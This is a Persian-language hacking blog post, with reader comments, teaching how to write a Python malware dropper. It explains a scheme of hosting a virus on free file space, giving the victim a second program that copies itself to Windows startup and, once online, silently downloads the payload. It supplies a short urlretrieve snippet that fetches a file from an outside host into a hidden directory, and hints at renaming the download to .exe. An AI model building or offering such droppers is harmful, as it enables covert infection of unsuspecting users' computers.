آموزش دانلود ویروس بر روی سیستم تارگت با پایتون :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

از اونجایی که برنامه های کامپایل شده پایتون یه خرده حجمشون بالا در میاد بخاطر همین توی این پست روی یه ترفند کار میکنیم که شاید توی ویروس نویسی با پایتون بکارمون بیاد

این ترفند به این شکل هستش که ما ابتدا یک ویروس یا ... رو مینویسیم و آپلود میکنیم توی جاهایی که فضای رایگان ارائه میدن بعدا لینک دانلود اون ویروس رو میزاریم توی یه برنامه ی دیگه تا برنامه ی دوم رو بدیم دست کاربر و بعد از اجرای برنامه توسط کاربر برنامه به استارت آپ ویندوز کپی بشه و بعد از اینکه کاربر به اینترنت متصل شد بلافاصله برنامه روی سیستم هدف دانلود شه و ادامه ی ماجرا ...

توی این پست بهتون میگم که تو پایتون چطور میشه یه فایل رو از اینترنت دانلود ، تا بقیش بمونه برای شما

برای درست کردن همچین چیزی خدارو شکر نیازی نیست که کتابخونه ای نصب کنیم چون قراره از کتابخونه ی urllib استفاده کنیم که توی پایتون 2 خودش بصورت پیشفرض هستش ، این کار هم کلا توی چند خط کد انجام میشه

خب حالا طبق دونسته های قبلیتون یه فایل پایتونی ایجاد کنین و کدای زیر رو داخل اون کپی کنین

from os import chdir
from urllib import urlretrieve

link_dl = 'http://bayanbox.ir/view/5950862607277819870/6016857953505659134.png'

chdir('Download Path')

urlretrieve(link_dl,'Picture.png')

خب حالا ما چرا کتابخونه هارو اینجوری وارد برنامه کردیم ؟

همونطور که گفتم پایتون وقتی که برنامه هاشو کامپایل میکنیم به فایل های اجرایی ، هر چی که کتابخونه import کرده باشیم رو کنار برنامه قرار میده و از اونا استفاده میکنه بخاطر همین توی ویروس نویسی یا ... هر چقدر از کتابخونه های پایتون بصورت بهینه استفاده کنیم ، حجم فایل های کامپایل شده پایتونمون میاد پایین پس ما هم بجای وارد کردن تمام توابع یه کتابخونه تو پایتون از توابع مورد نیازمون استفاده میکنیم که ما هم اینجا همین کارو کردیم !!! یعنی تابع هایی مثل urlretrieve و chdir رو از کتابخونه های urllib و os وارد کردیم

خب دیگه زیاد توضیح دادم بریم سراغ کد ها :)

تو خط اول و دوم تابع های مورد نیاز رو از کتابخونه های urllib و os وارد برنامه کردیم ، تو خط سوم یه متغیر با اسم link_dl (ساده شده ی لینک دانلود)درست کردیم و لینک دانلود فایل مورد نظرمونو ریختیم داخل متغیر که من بجای لینک ویروس ، لینک یه تصویر رو قرار دادم که لینک تصویر وب خودمونه

تو خط چهارم با استفاده از تابعی که از کتابخونه ی os گرفتیم میریم به یه دایرکتوری که فایلمون میخوایم اونجا قرار بگیره (باید یه مسیر مشتی بهش بدین که اگه ویروسی چیزی خواستین دانلود کنین رو سیستم هدف ، کاربر نبینه لو برین) ، من یه مثال براتون میزنم که میره به دسکتاپ ویندوزم

C:\Users\Starsat\Desktop

خب تو خط پنجم هم از تابع urlretrieve استفاده کردیم که توی urllib وجود داره ، بعدا توی پرانتز این موارد رو ذکر کردیم : 1 --> اسم متغیری که شامل لینک دانلود فایل هستش 2 --> بعدا یه ویرگول میزاریم و اسمی که میخوایم فایلمون با اون اسم تو مسیر مورد نظر ذخیره بشه میزاریم ، فقط باید توجه کنیم که پسوند رو چیز درست و درمون بزاریم مثلا من اگه png رو exe بزارم بنظرتون چه اتفاقی میفته ؟ :))

حالا اسکریپت رو با استفاده از دکمه ی F5 رو کیبوردتون اجرا کنین تا خودتون مشاهده کنین که چه اتفاقی میفته

موفق باشید

نظر (۴)

سلام داداش کدر بلاخره کار کرد این پروزه ممنون
Virus32 MR_C0D3R ‌ :
سلام ، اتفاقا بخاطر تو توی پست گفتم خدارو شکر نیازی نیست کتابخونه ای نصب کنیم D:
مر30 بازم از این پست ها بزار که نیاز به نصب کتابخونه نباشه D:
Virus32 MR_C0D3R ‌ :
باشه باشه :))
سلام
مگه نباید urlretrieve از urllib.request ایمپورت کرد؟
from urllib.request import urlretrieve
برا من اونجوری ارور میده
Virus32 MR_C0D3R ‌ :
سلام عزیز
راستیتش الان به پایتون 3 دسترسی ندارم که تست کنم ببینم برای پایتون 3 هستش یا نه ، اما اگه اشتباه نکنم تو پایتون 3 ماژول urllib وجود نداره بخاطر همین باید نصب بشه یا اینکه نحوه ی تعریفش بعد از نصب یا قبل از نصب به شکلی هستش که شما نوشتی ، اما تو پایتون 2 همونطور هستش که توی پست گفتم ، یعنی :
from urllib import urlretrieve
اگه پایتون 2 داشته باشی و به این شکل import کنی ، میبینی که ارور نمیده ، راستی یه سرچ هم بزن من سرچ زدم جواب زیاد آورد اما وقت ندارم بخونمشون ، اما دونسته ی خودم رو گفتم !!!
یه راه بهتر برای کامپایل کردن پایتون نیست که خروجی کم حجم تری داشته باشه؟
مثلا من یه فرم ساده با tkinter ساخته بودم بعد کامپایل حجمش شد ۴۹ مگابایت
همه چی هم بهینه بود مثلا وقتی از button استفاده کردم فقط تابع Button ایمپورت کردم
from tkinter import Button
Virus32 MR_C0D3R ‌ :
خیلی دنبالش بودم چون چیز مهمی بود اما آخرش نتونستم ، تنها راهش همین روشیه که خودت گفتی یعنی هر تابع رو از لایبرری خودش ایمپورت کنیم
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی